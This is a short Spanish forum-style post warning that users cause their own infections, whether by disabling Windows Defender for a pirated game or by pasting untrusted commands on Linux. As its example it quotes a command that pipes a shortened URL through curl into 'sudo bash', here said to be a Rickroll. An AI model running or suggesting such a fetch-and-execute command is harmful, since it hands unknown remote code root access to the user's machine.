Dejando los ataques de ejecución remota de lado (que la mayoría de las veces dependen de programas de terceros), supongamos una cosa:

Tenemos a juanito con el windows. A juanito le gusta ir a toda leche y atropellar a gente en el GTA San Andreas. A juanito le dicen que se le puede descargar desde Softonic.. juanito se lo descarga y lo ejecuta.. el antivirus de serie de windows (windows defender) le avisa de que huele mal pero a juanito le han dicho que nanai, que desactive el antivirus porque es basura y es falso positivo. Cuando juanito termina de instalar su GTA resulta que le salen popups y programas de publicidad por todos lados.. juanito esta jodido.

Ahora supongamos que juanito tiene linux.. y le dicen que hay un programa que le va a hacer que cualquier juego de windows le corra en linux. Juanito solo tiene que abrir el terminal y poner:

curl -s -L http://bit.ly/10hA8iC | sudo bash

Ahora juanito tiene a Rick Astley rickrolleandole en la terminal con su famosa canción Neva Gonna Give You Up .. juanito esta jodido... Pero lo mismo podría haber tenido eso que haber tenido un script que espiase o cifrase todos los archivos.. y es que al fin y al cabo, ha usado la palabra mágica (sudo) y ha metido su contraseña sin rechistar ni pensarselo.

Juanito es tontito. No seas como juanito.

Saludos